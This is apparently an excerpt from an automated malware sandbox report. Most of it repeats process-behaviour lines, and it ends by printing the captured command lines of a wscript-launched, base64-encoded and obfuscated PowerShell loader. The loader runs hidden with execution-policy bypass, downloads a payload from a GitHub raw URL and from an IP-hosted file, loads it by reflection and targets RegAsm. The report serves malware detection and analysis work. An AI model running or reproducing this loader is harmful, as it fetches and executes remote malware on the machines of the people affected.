    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2210Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1077Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3443Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6354Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep count: 3443 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep count: 6354 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856Thread sleep time: -17524406870024063s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: powershell.exe, 00000004.00000002.1818349189.00000178393F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Yara matchFile source: amsi64_7728.amsi.csv, type: OTHER
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc2OHVybCknKyc7ICcrJ2E2OGJpbmFyeUMnKydvJysnbnRlJysnbnQnKycgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGJysncm8nKydtQicrJ2EnKydzJysnZTY0U3QnKydyaW5nKGE2OGInKydhc2U2NCcrJ0NvbicrJ3QnKydlbicrJ3QpOyBhJysnNjgnKydhJysnc3NlbWJseSAnKyc9IFtSZScrJ2YnKydsZWN0aW8nKyduLkFzc2VtYmx5XScrJzo6TG9hZChhJysnNjgnKydiaW5hcicrJ3lDbycrJ250JysnZW50KTsgW2RubCcrJ2liLklPLkgnKydvJysnbWVdJysnOjpWQUkodWJ6dHh0LicrJ1InKydWJysnVlJTLzEnKycwOCcrJy8xMzEnKycuJysnNDgxJysnLjInKyczMi4yJysnNzEvLzpwdHRodScrJ2J6LCcrJyB1YicrJ3pkZXNhJysndGl2YWRvdWInKyd6LCB1YnonKydkZScrJ3NhdGknKyd2YScrJ2RvdScrJ2J6JysnLCB1YnpkZXMnKydhJysndGl2JysnYWRvdWInKyd6LCB1YnpSJysnZWdBc20nKyd1YnonKycsIHViJysneicrJ3ViJysneix1JysnYnp1JysnYicrJ3onKycpJyktY3JlUExhY0UnbWlNJyxbQ0hBcl0zOSAgLWNyZVBMYWNFIChbQ0hBcl05NytbQ0hBcl01NCtbQ0hBcl01NiksW0NIQXJdMzYgLWNyZVBMYWNFICd1YnonLFtDSEFyXTM0KSB8IC4gKCAkUFNIT21lWzIxXSskcHNIT21FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc2OHVybCknKyc7ICcrJ2E2OGJpbmFyeUMnKydvJysnbnRlJysnbnQnKycgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGJysncm8nKydtQicrJ2EnKydzJysnZTY0U3QnKydyaW5nKGE2OGInKydhc2U2NCcrJ0NvbicrJ3QnKydlbicrJ3QpOyBhJysnNjgnKydhJysnc3NlbWJseSAnKyc9IFtSZScrJ2YnKydsZWN0aW8nKyduLkFzc2VtYmx5XScrJzo6TG9hZChhJysnNjgnKydiaW5hcicrJ3lDbycrJ250JysnZW50KTsgW2RubCcrJ2liLklPLkgnKydvJysnbWVdJysnOjpWQUkodWJ6dHh0LicrJ1InKydWJysnVlJTLzEnKycwOCcrJy8xMzEnKycuJysnNDgxJysnLjInKyczMi4yJysnNzEvLzpwdHRodScrJ2J6LCcrJyB1YicrJ3pkZXNhJysndGl2YWRvdWInKyd6LCB1YnonKydkZScrJ3NhdGknKyd2YScrJ2RvdScrJ2J6JysnLCB1YnpkZXMnKydhJysndGl2JysnYWRvdWInKyd6LCB1YnpSJysnZWdBc20nKyd1YnonKycsIHViJysneicrJ3ViJysneix1JysnYnp1JysnYicrJ3onKycpJyktY3JlUExhY0UnbWlNJyxbQ0hBcl0zOSAgLWNyZVBMYWNFIChbQ0hBcl05NytbQ0hBcl01NCtbQ0hBcl01NiksW0NIQXJdMzYgLWNyZVBMYWNFICd1YnonLFtDSEFyXTM0KSB8IC4gKCAkUFNIT21lWzIxXSskcHNIT21FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('a6'+'8'+'url'+' = '+'miM'+'https'+'://ra'+'w.github'+'user'+'c'+'ont'+'e'+'n'+'t.com'+'/NoDe'+'tec'+'tOn/NoD'+'e'+'te'+'c'+'tOn/ref'+'s/'+'he'+'ads/'+'main/De'+'t'+'ah'+'No'+'th-V.t'+'xt'+'miM; a68b'+'ase64Con'+'ten'+'t ='+' (New'+'-'+'Ob'+'je'+'c'+'t Sy'+'s'+'tem'+'.Net.WebCli'+'ent)'+'.'+'D'+'ow'+'nload'+'Stri'+'ng(a'+'68url)'+'; '+'a68binaryC'+'o'+'nte'+'nt'+' = [System.Convert]'+'::F'+'ro'+'mB'+'a'+'s'+'e64St'+'ring(a68b'+'ase64'+'Con'+'t'+'en'+'t); a'+'68'+'a'+'ssembly '+'= [Re'+'f'+'lectio'+'n.Assembly]'+'::Load(a'+'68'+'binar'+'yCo'+'nt'+'ent); [dnl'+'ib.IO.H'+'o'+'me]'+'::VAI(ubztxt.'+'R'+'V'+'VRS/1'+'08'+'/131'+'.'+'481'+'.2'+'32.2'+'71//:ptthu'+'bz,'+' ub'+'zdesa'+'tivadoub'+'z, ubz'+'de'+'sati'+'va'+'dou'+'bz'+', ubzdes'+'a'+'tiv'+'adoub'+'z, ubzR'+'egAsm'+'ubz'+', ub'+'z'+'ub'+'z,u'+'bzu'+'b'+'z'+')')-crePLacE'miM',[CHAr]39 -crePLacE ([CHAr]97+[CHAr]54+[CHAr]56),[CHAr]36 -crePLacE 'ubz',[CHAr]34) | . ( $PSHOme[21]+$psHOmE[34]+'X')"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnytynkyc4jysndxjsjysnid0gjysnbwlnjysnahr0chmnkyc6ly9yyscrj3cuz2l0ahvijysndxnlcicrj2mnkydvbnqnkydljysnbicrj3quy29tjysnl05vrgunkyd0zwmnkyd0t24vtm9ejysnzscrj3rljysnyycrj3rpbi9yzwynkydzlycrj2hljysnywrzlycrj21haw4vrgunkyd0jysnywgnkydobycrj3rolvyudccrj3h0jysnbwlnoybhnjhijysnyxnlnjrdb24nkyd0zw4nkyd0id0nkycgke5ldycrjy0nkydpyicrj2pljysnyycrj3qgu3knkydzjysndgvtjysnlk5ldc5xzwjdbgknkydlbnqpjysnlicrj0qnkydvdycrj25sb2fkjysnu3ryascrj25nkgenkyc2ohvybcknkyc7iccrj2e2ogjpbmfyeumnkydvjysnbnrljysnbnqnkycgpsbbu3lzdgvtlknvbnzlcnrdjysnojpgjysncm8nkydtqicrj2enkydzjysnzty0u3qnkydyaw5nkge2oginkydhc2u2nccrj0nvbicrj3qnkydlbicrj3qpoybhjysnnjgnkydhjysnc3nlbwjsesankyc9iftszscrj2ynkydszwn0aw8nkydulkfzc2vtymx5xscrjzo6tg9hzchhjysnnjgnkydiaw5hcicrj3ldbycrj250jysnzw50ktsgw2rubccrj2lilklplkgnkydvjysnbwvdjysnojpwqukodwj6dhh0licrj1inkydwjysnvljtlzenkycwoccrjy8xmzenkycujysnndgxjysnljinkyczmi4yjysnnzevlzpwdhrodscrj2j6lccrjyb1yicrj3pkzxnhjysndgl2ywrvdwinkyd6lcb1ynonkydkzscrj3nhdgknkyd2yscrj2rvdscrj2j6jysnlcb1ynpkzxmnkydhjysndgl2jysnywrvdwinkyd6lcb1ynpsjysnzwdbc20nkyd1ynonkycsihvijysneicrj3vijysneix1jysnynp1jysnyicrj3onkycpjykty3jluexhy0unbwlnjyxbq0hbcl0zosaglwnyzvbmywnfichbq0hbcl05nytbq0hbcl01nctbq0hbcl01niksw0niqxjdmzyglwnyzvbmywnficd1ynonlftdsefyxtm0ksb8ic4gkcakufnit21lwzixxsskchnit21fwzm0xssnwccp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('a6'+'8'+'url'+' = '+'mim'+'https'+'://ra'+'w.github'+'user'+'c'+'ont'+'e'+'n'+'t.com'+'/node'+'tec'+'ton/nod'+'e'+'te'+'c'+'ton/ref'+'s/'+'he'+'ads/'+'main/de'+'t'+'ah'+'no'+'th-v.t'+'xt'+'mim; a68b'+'ase64con'+'ten'+'t ='+' (new'+'-'+'ob'+'je'+'c'+'t sy'+'s'+'tem'+'.net.webcli'+'ent)'+'.'+'d'+'ow'+'nload'+'stri'+'ng(a'+'68url)'+'; '+'a68binaryc'+'o'+'nte'+'nt'+' = [system.convert]'+'::f'+'ro'+'mb'+'a'+'s'+'e64st'+'ring(a68b'+'ase64'+'con'+'t'+'en'+'t); a'+'68'+'a'+'ssembly '+'= [re'+'f'+'lectio'+'n.assembly]'+'::load(a'+'68'+'binar'+'yco'+'nt'+'ent); [dnl'+'ib.io.h'+'o'+'me]'+'::vai(ubztxt.'+'r'+'v'+'vrs/1'+'08'+'/131'+'.'+'481'+'.2'+'32.2'+'71//:ptthu'+'bz,'+' ub'+'zdesa'+'tivadoub'+'z, ubz'+'de'+'sati'+'va'+'dou'+'bz'+', ubzdes'+'a'+'tiv'+'adoub'+'z, ubzr'+'egasm'+'ubz'+', ub'+'z'+'ub'+'z,u'+'bzu'+'b'+'z'+')')-creplace'mim',[char]39 -creplace ([char]97+[char]54+[char]56),[char]36 -creplace 'ubz',[char]34) | . ( $pshome[21]+$pshome[34]+'x')"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnytynkyc4jysndxjsjysnid0gjysnbwlnjysnahr0chmnkyc6ly9yyscrj3cuz2l0ahvijysndxnlcicrj2mnkydvbnqnkydljysnbicrj3quy29tjysnl05vrgunkyd0zwmnkyd0t24vtm9ejysnzscrj3rljysnyycrj3rpbi9yzwynkydzlycrj2hljysnywrzlycrj21haw4vrgunkyd0jysnywgnkydobycrj3rolvyudccrj3h0jysnbwlnoybhnjhijysnyxnlnjrdb24nkyd0zw4nkyd0id0nkycgke5ldycrjy0nkydpyicrj2pljysnyycrj3qgu3knkydzjysndgvtjysnlk5ldc5xzwjdbgknkydlbnqpjysnlicrj0qnkydvdycrj25sb2fkjysnu3ryascrj25nkgenkyc2ohvybcknkyc7iccrj2e2ogjpbmfyeumnkydvjysnbnrljysnbnqnkycgpsbbu3lzdgvtlknvbnzlcnrdjysnojpgjysncm8nkydtqicrj2enkydzjysnzty0u3qnkydyaw5nkge2oginkydhc2u2nccrj0nvbicrj3qnkydlbicrj3qpoybhjysnnjgnkydhjysnc3nlbwjsesankyc9iftszscrj2ynkydszwn0aw8nkydulkfzc2vtymx5xscrjzo6tg9hzchhjysnnjgnkydiaw5hcicrj3ldbycrj250jysnzw50ktsgw2rubccrj2lilklplkgnkydvjysnbwvdjysnojpwqukodwj6dhh0licrj1inkydwjysnvljtlzenkycwoccrjy8xmzenkycujysnndgxjysnljinkyczmi4yjysnnzevlzpwdhrodscrj2j6lccrjyb1yicrj3pkzxnhjysndgl2ywrvdwinkyd6lcb1ynonkydkzscrj3nhdgknkyd2yscrj2rvdscrj2j6jysnlcb1ynpkzxmnkydhjysndgl2jysnywrvdwinkyd6lcb1ynpsjysnzwdbc20nkyd1ynonkycsihvijysneicrj3vijysneix1jysnynp1jysnyicrj3onkycpjykty3jluexhy0unbwlnjyxbq0hbcl0zosaglwnyzvbmywnfichbq0hbcl05nytbq0hbcl01nctbq0hbcl01niksw0niqxjdmzyglwnyzvbmywnficd1ynonlftdsefyxtm0ksb8ic4gkcakufnit21lwzixxsskchnit21fwzm0xssnwccp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('a6'+'8'+'url'+' = '+'mim'+'https'+'://ra'+'w.github'+'user'+'c'+'ont'+'e'+'n'+'t.com'+'/node'+'tec'+'ton/nod'+'e'+'te'+'c'+'ton/ref'+'s/'+'he'+'ads/'+'main/de'+'t'+'ah'+'no'+'th-v.t'+'xt'+'mim; a68b'+'ase64con'+'ten'+'t ='+' (new'+'-'+'ob'+'je'+'c'+'t sy'+'s'+'tem'+'.net.webcli'+'ent)'+'.'+'d'+'ow'+'nload'+'stri'+'ng(a'+'68url)'+'; '+'a68binaryc'+'o'+'nte'+'nt'+' = [system.convert]'+'::f'+'ro'+'mb'+'a'+'s'+'e64st'+'ring(a68b'+'ase64'+'con'+'t'+'en'+'t); a'+'68'+'a'+'ssembly '+'= [re'+'f'+'lectio'+'n.assembly]'+'::load(a'+'68'+'binar'+'yco'+'nt'+'ent); [dnl'+'ib.io.h'+'o'+'me]'+'::vai(ubztxt.'+'r'+'v'+'vrs/1'+'08'+'/131'+'.'+'481'+'.2'+'32.2'+'71//:ptthu'+'bz,'+' ub'+'zdesa'+'tivadoub'+'z, ubz'+'de'+'sati'+'va'+'dou'+'bz'+', 